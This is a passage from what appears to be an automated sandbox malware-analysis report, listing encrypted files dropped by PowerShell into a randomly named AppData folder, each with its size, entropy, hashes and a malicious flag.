                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xc4OFOViK9TEAKWOR+pZkwX1GohxkOb0Fijy5P0jwRlPzFNi82cjAnmT:xsKhEQ/ko1zhy9ijUqk1zbi8hAnk
                                                                                                    MD5:5B411B28C970ECE8A197C4681129FFEF
                                                                                                    SHA1:2FA7F19EB541C1F24D934A56E6714FC5CF175DEB
                                                                                                    SHA-256:88DB2C34BC83CDE0413A124EB7753C4D21A53098F25AE8FB8CC05080C0B0C7B5
                                                                                                    SHA-512:C17813BE19200753EA93F93017AE90E196308579FC8479CC99EDF2B18F28B4E7ACF8B9E330204C906E09FFD0C90768D883E1A57D02146D4F3A6C6F51D2746F7E
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RwplegIUuTzoJVExvd.iryKnwxsIA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):164464
                                                                                                    Entropy (8bit):7.999062293261327
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:DSbkDKXjCWDPYNK0BQZPOsfAWUJwdIJmca+dcF45cti+9lnWL:ObkSjCc89BKGs66dWe9C5uiMlnK
                                                                                                    MD5:4F3E903A264CBCDDB59BCB9D7FB2A153
                                                                                                    SHA1:175DC7B2C00E3F21676F401657BBCCE0B6848355
                                                                                                    SHA-256:0A9485A1D6BE472531B43660FAA99122D0AC142BD1DFA3D57CEBFD66D4B66D70
                                                                                                    SHA-512:153E6517A9C9255C6AD63497332C865A340A32B97C91AB80817798E852612400B334C4F096521B0EA7C525FBB03B8AECBD19F19CFC82B1D1652265C757591D57
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\SZEwUsrtgzTLq.IKJoYcWZNqjmy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):111267
                                                                                                    Entropy (8bit):7.998522770999148
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:wJpPjE4RXn6EVJPgQKiP8uonTohojJHalQhokhWi+xp/wovekffvo6AT9sqh+s0:APQgXhHVPPo/JHvhP1ovekfY6q8
                                                                                                    MD5:7B0638267A3C7D0B49A6D0797B96A73E
                                                                                                    SHA1:1AAF1C77C87DA62D7AD78338BFD7C9DFD57EC258
                                                                                                    SHA-256:1C525AAAF38A24B901295A5C7E8E2B4043B219AA3707F7CF4EC8443A6A4E5CBF
                                                                                                    SHA-512:CB261CAE2D948BE929853A28C5E9B31B1909A2847D2BAC70A12C92A84419AE6C51CEE4E42B0F07F5732E2BF9A372325E377F2A4F8B133E71B1AECE0058CA06E7
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\SfRdKQeADCtX.JvYsgXIiDlwhoxKntB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):184405
                                                                                                    Entropy (8bit):7.999096730799414
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:3OJfn1qFzi4oy1RWEOhyaz0WvX3kHWV+IqxFvK0Trc8KXlRKDuRjVgn96k34t2u:+FYm4Dzr+X3PIIqxo0TrEAK7gAkoou
                                                                                                    MD5:9A9CA657566CB0EA75247E4C9A6AD609
                                                                                                    SHA1:BA707B5C0BAC78E35D4F3A973BB2E2F05EBF0942
                                                                                                    SHA-256:05711115FD1525B4D0BBED8EBF6AE77983BACE30F8F84C2DBFB70BC8DB8D5E79
                                                                                                    SHA-512:B1CDA5529451C76D353636A68523CE00BA41272E0A976556D8ED1420A2B16D8A858A2AF4FB6271287CD71613A66A1F8ED82969625CD584A6B190FB5C8764875C
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TLuMnmVEcNIzhYlj.RSclJBIusQbepmFOrT
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):190716
                                                                                                    Entropy (8bit):7.999026979433373
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:/xw475ewSkDTCaASTwY6USa1VeClufTbjHAVCG7KVejgh27TXBq:/V75e2nnAje1VeClu7bDaCFR270
                                                                                                    MD5:B65FFB8F843E675AA07EB94CC3B86E28
                                                                                                    SHA1:1C2E93857BC546320F5A1DF73E94BF9C2BCD70CE
                                                                                                    SHA-256:D689E05F08CCA93C64B6339DC0D537715E093279583CAE5948B527929094D44E
                                                                                                    SHA-512:84F702F5DE18EE4E9994F4AB87BDF0E26148DDA56648F50F1B29C3B33073CED5347CFAB7B2B226CFEC553A4B86D13FC8C38FD91CA7FB7B944DF2614A4FF45030
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TMDPfUGCOdpw.mCRoOzBkGQrPAgtNbHd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78518
                                                                                                    Entropy (8bit):7.997813436637588
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:DxgbtO7/KrT+gCVwDPlQvgsRNK0BQZPOsfQ4Yd3G70zYIPoy4m:DSbkDKXjCWDPYNK0BQZPOsfAWUJwE
                                                                                                    MD5:258F511C4AC4DCBCD30D040D1961AC0A
                                                                                                    SHA1:157C02CE0832EDF8A5EEFF640308CED373436313
                                                                                                    SHA-256:20D8B9FBBC35F09F4D1BA3492BE724A31C14DD08BBD95E4019E0441BC244028C
                                                                                                    SHA-512:4265C61E33CA126CF0D97F38C62F24433FB69942AD7A5B4301F82A4917458AC30782C36FD221D5922C84CF5212C19975AE6ABC016222AA613384742ED2275FA3
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TeLuOYhiUjVxzCo.QmnFOgcVdr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):134468
                                                                                                    Entropy (8bit):7.998852772013272
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:a2dIvvMIA1ht09xWgw5QnBO0/7PrUtMbByLGG7FVO:asnd0CfmnBhDUGBYGG7bO
                                                                                                    MD5:8E91F0A1040A7AC89AE14D67BB62253A
                                                                                                    SHA1:D6384A1E587CE9B9FFE8E3DF83FBC08E3130F742
                                                                                                    SHA-256:FA805975E8C3CC6883B9F50780AFA3FED97A048207F91759AF66334E1505B9D2
                                                                                                    SHA-512:F0085DC1BF60A30534357CA1DC5B7E92CC24D15A3A08B4D97027A34156A4BE25F4E38D167E45229904816FDD31C94EBFB9D0039DAEE8989A61B0ED14F1B41F9D
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UASjmZVExuWitHd.cUpNCLnXqzkdMZjwlP
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):185983
                                                                                                    Entropy (8bit):7.998982481310546
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:D4aVHMeLopkN51bmfmUzd122T22aYjTSs3PHh5A4jClQaR4qHblZvV19/hollHs4:TCeEmUD22Tbpjus3PzWlQtqHPVf/SMOT
                                                                                                    MD5:F5E83FCB7FB129524BB77139A05E1574
                                                                                                    SHA1:E03DC9E485DC75FE9E264876FA1E115228C164AB
                                                                                                    SHA-256:804028956E881FDE64E15ECFF3041BAD6D787A0051ADDEED27BB27DC14057B5D
                                                                                                    SHA-512:E0F3A6EA7070BADD8CFAD3EE443C42FEC4A61E145A77AF2C0F3C7AD8BAAF1B9E9A2A7F0847244D85866833D5ED6699BA3CFB3526AAB1706F3875E6B41F04A19C
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UCFaKkJmTSsWyh.qGRMCmWBiYKnoHSlLEb
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117351
                                                                                                    Entropy (8bit):7.998336580822975
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:l1Ql2fBdaK8lKli7p876umGUnA02JZW0d:XQlYBdF8Uw7p876um4r
                                                                                                    MD5:FD341EDAA5BDC642FF84354155EC81DF
                                                                                                    SHA1:F0C2FBEBE5DF8D490FCAB31E45BBE0BECE0D951A
                                                                                                    SHA-256:2BEF438DF8F1A3EEAE9F5070C36792E0E3DF578A2AB5C8CD8AD848F4CC85D289
                                                                                                    SHA-512:1A7A972EA6A5BE731942B1C0829C0635D50949DCF75059FF5B084DF25CBC96EF28A764C1EC7636D0DA39E175F33E730BB1BA60B53BCC26921BDC2E56751F1420
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UKhCsubemgyp.UtjOkbCVrGJosyNavYS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187874
                                                                                                    Entropy (8bit):7.999079203016247
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:U4d9O5KjCZ7d+9UhmcEUBDwYUkPV1KYLUDVbePPOGb2VtOPFUffu0XQldS51fsAe:USiKjC5bhmHUhw1quZePv2wGffuC5xsf
                                                                                                    MD5:64772D344E001983A56CA4308C83ADD0
                                                                                                    SHA1:33D88595206FE896C1DBF1CA7124168A3779871C
                                                                                                    SHA-256:3259704D1F063B26760E1AB2B62944F3B801C917A00D7DFAE7F02267D2FDCBE0
                                                                                                    SHA-512:9B356B70DC3CDBEF544D7BB3D32F32FB42A860E2B0B2B757D72AAA96E73CE00DDE62B9E10361C01A4D3728DAB6EA66044872BFE2E693600A2F51C5BBA0BD72F6
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VHuBdTtSOiYELFrwZDv.jhfZQXHGognVTq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):169527
                                                                                                    Entropy (8bit):7.998882033052513
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:46/mX8L6xADibdTMheyZKZMbw1MK+QZqKa8U+eM4BKAqdNReAoYaw0vz7g:nL3SAlZDIqKk+3NrUz8
                                                                                                    MD5:3990FA43D496FD8E7B0B486D89D181AF
                                                                                                    SHA1:E44F91BE2DEEDC6D157812EB7039023129A5304B
                                                                                                    SHA-256:ED2D1919AAF9721932E3535ADB8B355D7B55560B2095CCF3AF9A2D53F6202E13
                                                                                                    SHA-512:1CEA64CF7519A5F90235BC4E7C7D0860ACD3BE2D87FAABEDAE94A67DBE9EDC65B62B1CDF585AE94401FEC67B9891E8CCC6669931A99BD6B1FBA55039907F4ADC
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VLUinDlmkaIWF.YFrIpXlSVUzvPBRmA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):179349
                                                                                                    Entropy (8bit):7.999051528112829
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:6UFBoiWxoI3DSfC8m/V18fuIICKOEeXrYYwZS0cV+lMR8lzi+VUp8OYddgdPf2GZ:6UFBoi1I3OfC8m/V18fpEeXMYwZSw5iD
                                                                                                    MD5:5F7A41E0E6C8C197A077655DDBEA827D
                                                                                                    SHA1:872C840670442EF39A5187F17820A388CB967A8A
                                                                                                    SHA-256:758F43D3706C79B1DB9CF1D1418330A5E1965D5007186FCBA70F544E55DA99B9
                                                                                                    SHA-512:BC997DC40DC7C9371442C38017CE0767C1B089E8AD3F308E10B38855986B281DA85DF637BF1AA2716172BF7FCBFAADA62272A0B8E147092450EFDE206693FB3E
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VNFnzYSLqGlsm.avQNMKtfDhAeUdoRmXu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94901
                                                                                                    Entropy (8bit):7.998173699189971
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:8PVIWd6eryovDlRa/mnd5KSVp1tv0b91jC9cIxkE99bSMU5/mCTOmP:Kj0nUDi/EPDVp1tv895bI68bSMU5/fTJ
                                                                                                    MD5:2E0F7385BF7FA1A203630749F9F683D0
                                                                                                    SHA1:435A6B9B5F51D83AD816942B51890BBB2D07E121
                                                                                                    SHA-256:A876FCE95B5C78A9F8347C8840D84B6EFFDFC0D7C26EEE939D61A9C7ED83CD68
                                                                                                    SHA-512:82CF56E555DB3FC625147A1A200C633C39167E6D444CA63AD0B7EF40A64D0B24AE369D2AB893AF9EB9A9F9752877802B0F3F62D51A65BAFC099B5D01E9716CA8
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VjxZCzMfWu.wIZnAKasSVge
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67541
                                                                                                    Entropy (8bit):7.997588323315147
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:pTdBdwRAh9/z39rYDgavWkYXmc+oa9GziC3hLrj8:TwAzB1avSraJC3hw
                                                                                                    MD5:B40CAD8D30E6059A1585763F313E7DC7
                                                                                                    SHA1:9EA9186AE5F5832BA0DE9749C0DBC361F26B72BB
                                                                                                    SHA-256:1C531FB017F6192E2E50355F6073221D54D253C28F50C03B0A20EB1BABB61E0F
                                                                                                    SHA-512:097AF0B979067AB87BFF34DF1A5E2C7B14CCBB3D9CDEC3F283C670C4E6F8B0EA58E452676E1BEA4DDA8983A35CA3CDF2AC6F1C8CED78202552BCDB6D080BF820
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WNpCtncjMmgZzh.NpdiSJRDag
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):71561
                                                                                                    Entropy (8bit):7.9976352663749
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:85fIQQ4rFs+UFW4EXbIDam7tVbK0zwyQ99y89jGXwGigl:YfIR48FWRYaot9hcyQHHyXhiQ
                                                                                                    MD5:35CCC59C78C198360A408B559D4FC7ED
                                                                                                    SHA1:881EC6E824B7DA20968DAF6A744BB26FC1DFC87E
                                                                                                    SHA-256:28439CB0C99E21273F323C7400E7347D61B2651CC43994188B8C7E0DB72A98A3
                                                                                                    SHA-512:F1139B5C988DA8D5B211EBF068B6D342F4705D6680F0BA44DCFAAFD08AE9763374A7B7B5598861BEB7939ACF8CAF7C636D7416F76E6566844031D43D801C87C6
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WOgMdFVzRxuwZPJnQki.yczDkMqjYSNFnv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):142203
                                                                                                    Entropy (8bit):7.998833579913713
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:qQ+vlAESNxblWIHtYmE5PEIYjp01KDrQw6+BsM1Yi27iew:5mAEiWqYBVEt9DrQyBsCUO
                                                                                                    MD5:B47A38AA72EEFF1B485EEB309902DA1D
                                                                                                    SHA1:AA1B92B3DD5030BCE4E0FE1C95EDF87B7E6A67FE
                                                                                                    SHA-256:B617D91825C439D831FA3CCE82A21482953EC98A0291712F68C693064FC53C24
                                                                                                    SHA-512:A0E747A246448ED729FF51EE52D2043227356D209861D8198D7B5E72CE28B3C81ABAB76A6EE97DA980733A899230FDBF0BD503AA31CDE624ABE4A875686C3CC4
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WQiMoDsnytOzVGj.ExTuylLpNoadkj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94443
                                                                                                    Entropy (8bit):7.997849443709446
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:sdCW/kMfp3UL1CsJlg1soMeX5TxXOrKl8AdolfRLYcSwrHcZ5q/7gGQXNu7lDj:6CWMMfpELpJlLzeX5TxxGASZRLbxoZ5m
                                                                                                    MD5:D9CF2E5C0E5416BB4D42549159F6CFDD
                                                                                                    SHA1:50BC4A72CAC1D7C005AD2F9A520B624439217E78
                                                                                                    SHA-256:6FE206994CA1F4FCE21D4EA1EC67ECA1BE9F8779CAA6F1BC034004F2F04529BC
                                                                                                    SHA-512:8A46BBC238199B9AF1B5F5DC4A0BF3CEC15B9F60DE78C2021B253B95DDC2B8FCF1DE370043F03E7F690686C6CA00F4296629549C5BBD0AF2CE411CD28B5DC087
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WXUMcfOEhAxazDm.BQYpoGWVfIL
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):58195
                                                                                                    Entropy (8bit):7.996873260972073
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:ubobOGrk84Q/IhMuQAa3Zog3synVnEd6b+rZ/:HRrk8J7uQfaO/nYI69
                                                                                                    MD5:454E1EB768A5F0C8171AFE80781030DB
                                                                                                    SHA1:E255FA644541DE808F08064F1F077206D1BDC2A2
                                                                                                    SHA-256:B8FD9BC43E59CCB58AF430DB9C20C4707E1D4EC9A1D573E5000F45864207F648
                                                                                                    SHA-512:8B2EE82488D91EE24C519AF953527B259956783055ECE1AA472C90EB93832F363640DAC470094FA683174EFF33956A136B486141782618AC3658DE86FF5A4DFA
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WdocsaMvqC.BEltMzSxPCu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):104266
                                                                                                    Entropy (8bit):7.998170098084108
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:kNnfDNDN4qPi2cYXaB9SCqUCsRlek4CKRsX4KZjQ:kFfD9NPq2cY00C0clAC2
                                                                                                    MD5:814D7F7A8977B721E1427B33965406E1
                                                                                                    SHA1:1549C6131878990B47CF7D88A1B82834EE4DAE39
                                                                                                    SHA-256:4D6992AFA4ED21FAA1697F8C0E17179D34022FD3B3A699FACBFB74C79FDE93F1
                                                                                                    SHA-512:4129ED56878D39A3AC621A98C11D1349B8D26818A22EDC9A679FAB751A6C4C5F12C90CA0CFA486B0BFD62FCA19CC75F75987D38DC609E625E5DA6B63C50D04A7
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WmkObYTAauDCZHnGQy.IPVXCLREhywujd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):82597
                                                                                                    Entropy (8bit):7.997855943428036
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:tCPvbsDGD3x/DaX7DocIDuDywwESnmfS54PoR/LR4eFEU13feU/m0RJUiV8SIIr:t+vbh1avfHzpIKaLeeFEU13WUuwUe1IQ
                                                                                                    MD5:3B04A24455D642E871DDDFF99DC1DA9E
                                                                                                    SHA1:7D04C2C30802891566D65D03ABD89A56C458EE02
                                                                                                    SHA-256:6552DA6CE8DB404FD6493781CC0B0D7B0FF5472454EB825113FD0E97BE5EC3C1
                                                                                                    SHA-512:BF697BDC36620C520068EFD6B5350CD579CCA390BFF90ED6AB640BC0927980167D473708DA81F441C5D266B7243C2250F9D87A2C2780F4E037DE7B8E1EAE4ABD
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WweARKxUhnzGd.RfDetyJBwqIuVCAhsj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161939
                                                                                                    Entropy (8bit):7.998765944911481
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:BHEPIYuxWHlM095TXNT84DJYiUq5cwFNeHC4zmmTPb+I/96B7:FEPI5xWHJ9xXCw5cMsHC4zHTPb+I/07
                                                                                                    MD5:D8EC8EF3C4BB8D9942B9FB2C22F524AA
                                                                                                    SHA1:555DB2D66BBBE870253F672A2958EABC2CA47F10
                                                                                                    SHA-256:CBB4B509ECE69A8B78151A9FAF9CA18D9A9860A9BC08100BE79BFAF4591EE6B1
                                                                                                    SHA-512:48208B6A52404AB740E130B0744D34D5052C2B710785CBBFE268C836BDE35CA69B0DE46454CD1157498F4489388B961D584BE1C4988FCCAC7585448CEB1F49F9
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XdMowcJHIlpDuhL.gVBaQuUhMYIqnFTzxWm
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):179288
                                                                                                    Entropy (8bit):7.99899460900469
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Z3qAjO6qNUNgk02urs3FnpDIsMMQVvHlhQtmC8uUPi6EvkxoaVZSNO+OhgxWDbZ:QcYGNQSsHrQtdUbEUoaVZSNLa1fZ
                                                                                                    MD5:50105073CDE5E7BA2968944BD985F259
                                                                                                    SHA1:2346717B0CE071A621016A06888E39FE077D6036
                                                                                                    SHA-256:29364E367AA3E1266C82559877C8CB04C780E742ADB40A54DD72682890902C8F
                                                                                                    SHA-512:44AC9893555859C76D34228065710029F31EADF229981C83E1A7CBFDCE5900EB771B64F4501E85AA22302B080877A00DAC924201E06D8B49E635428C82FBBA05
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XvAsEkwdxBRhWUocIS.jnYUgzbqMFXc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78371
                                                                                                    Entropy (8bit):7.997669879202634
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:rVXWLaTj4k8SjCCvS5f35fwS8a1fyX/E4I9uFld4P/hcT40L9q7Fh:ZmIjCCvS5fcMHCbM0RG3
                                                                                                    MD5:6CFDF3E30EF920A7ADEEEE880A576514
                                                                                                    SHA1:6CE8C626198DD660AFB0676BCBC3551FEDF2C1B2
                                                                                                    SHA-256:FBD9A6C6C186A8A347238393CC4F5B4B8B2CDF784349693C9AAAD0A5CCE65DC2
                                                                                                    SHA-512:1B9FD8BAE26964DFDB9F19343B1E8B183E8D0E0D825C1DEBF38A3342C705DB67A3BA24664794FFFF28A2878BE700B8DCF1A85B8471032DD0B2128CF4BEB69E4D
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XyzwqDGQdxARegWKLnV.cduOWzUjoFsgP
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):81280
                                                                                                    Entropy (8bit):7.997574944435424
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:ZkeoG/eahWUzwsDT4xDT+2Ke2Lqif0oWAbN9gRXPRuliwU:2XJ6WzET4xcfmo01ArwPRuu
                                                                                                    MD5:160F823312272368E54F0D967567F90B
                                                                                                    SHA1:5815AB4508C80E5F8A4323692768C2238F593A57
                                                                                                    SHA-256:2C0189FA9705184F1D1FE85AE9C1B64AD98A692F564FDFD82F387603212AD444
                                                                                                    SHA-512:3E82FE79E4317979B6E9B687D25E0C7477AC2E8D4A1F3F5A78FF546DC864A70348D1ED18C4A6081C9C00D44421CE24F73B502013F59EA591E4E01000706BFA3E
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\YExswGcFQdmqReLk.yVEglkAHWTcpzJN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77450
                                                                                                    Entropy (8bit):7.997701539844603
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:AYUpbQLlumUsTcYqN04MiStNseZ8YF0C/lI3vnz8ekSt9KU:AYmbQLlumUsfxyCN0CdI3LNkcV
                                                                                                    MD5:998153722662CA9C49D6F9B31F51D25A
                                                                                                    SHA1:CB0A582E97FDEF0D412E22236BB992E4A8AE7711
                                                                                                    SHA-256:5BCD397552B9501E545C65BC4769008B91499B3153C1BC13A88C4425E9A0B042
                                                                                                    SHA-512:17CB653441AFB2263EF175D90C33EA880F0900C27339EBBAD23B48E78B285F896E83CE554C410C28DDF6A427CF327569B18321B6F8733BC66EBA32A2EA8F9E61
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZBdPHgSRjJTyFKU.LYPlgSiyFwMU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165288
                                                                                                    Entropy (8bit):7.998963581279175
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:gq7fN2MCZMpJqFi5OF23GWl2Suvha5NI2AQDOrXizNxndsf4X6/KOLgF6yFNDJ:gZCkFiw47hNI2AQuKneA6hEF6I
                                                                                                    MD5:8851F504CD041702009DCC893DF611D1
                                                                                                    SHA1:5EA01BB4CFC8F408AC41E970EA7389935B2AEF4A
                                                                                                    SHA-256:DD9FB05BA49C2EA22DA285A223C00878E07B9F7056B336610FBE786F206AC2E0
                                                                                                    SHA-512:BBE1CFC68C9D9F13F979FE678C6A9B6B1DC4947B35E32125F2931CA1AD21007C4777BB7754D777AD55FDD303B22C08C8926D0F737AEC2851647D9A9CE336A0A1
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZJkgcGOoaTPenB.WLfQqizIwsuJxE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):120436
                                                                                                    Entropy (8bit):7.99875624833529
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ILrGpTcrQXs+NdI7uA6K7mKwY0Nf9nhUexAp+p:ILrJ8SlJfM9+e6i
                                                                                                    MD5:482F858B584A14A8CA7CB397C928E121
                                                                                                    SHA1:89625521238F57E58193B6C6F8868FDDFA5B1457
                                                                                                    SHA-256:2838F709803647806B58E95B739F7A87F331E802BD2CA840CA67B60CF30012AA
                                                                                                    SHA-512:A57961F63CB5631318C9B90298FC2A8C7F8BA46FB386A0FAA4DC8934586599EF94E9C81E05968753849B492B1795223A9DD281050A4572E948370D93CC4306F5
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZSQcNEOCztejdm.quGefcAYyXgDSot
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79616
                                                                                                    Entropy (8bit):7.99763458544086
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:XI2WKq7NJoY5wIanFPNW2SbId8REGruc6oxFut72xZD1LvKHcAsMnE5:ZWn7NF5wIanFPNW2Sb/E+ucR7u52xZ9N
                                                                                                    MD5:EE130997E1796F2EDB776570DB514D9D
                                                                                                    SHA1:55FF9E6ECCC1BE5BF1EA887C2E18C24495C8F492
                                                                                                    SHA-256:728C09759A54B959779DD4295CDD1C3697F31C5E138F378A7306B25B3A1A1E1F
                                                                                                    SHA-512:477DB1C10B1952108B6B7C4B8E429A95BA73AD202090E67C253CD8572B91F8556B964F658EC0D323324867FD6F21D0A6959FDCCE9F9B382A8FADF1F7FA2C277A
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZfrxTeWIsXbjypzJFid.QdkxpCzEYg
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):151904
